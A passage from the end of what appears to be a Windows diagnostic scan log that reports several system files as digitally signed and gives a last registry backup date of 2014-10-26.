signedC:\Windows\SysWOW64\User32.dll => File is digitally signedC:\Windows\System32\userinit.exe => File is digitally signedC:\Windows\SysWOW64\userinit.exe => File is digitally signedC:\Windows\System32\rpcss.dll => File is digitally signedC:\Windows\System32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2014-10-26 11:43 ==================== End Of Log ============================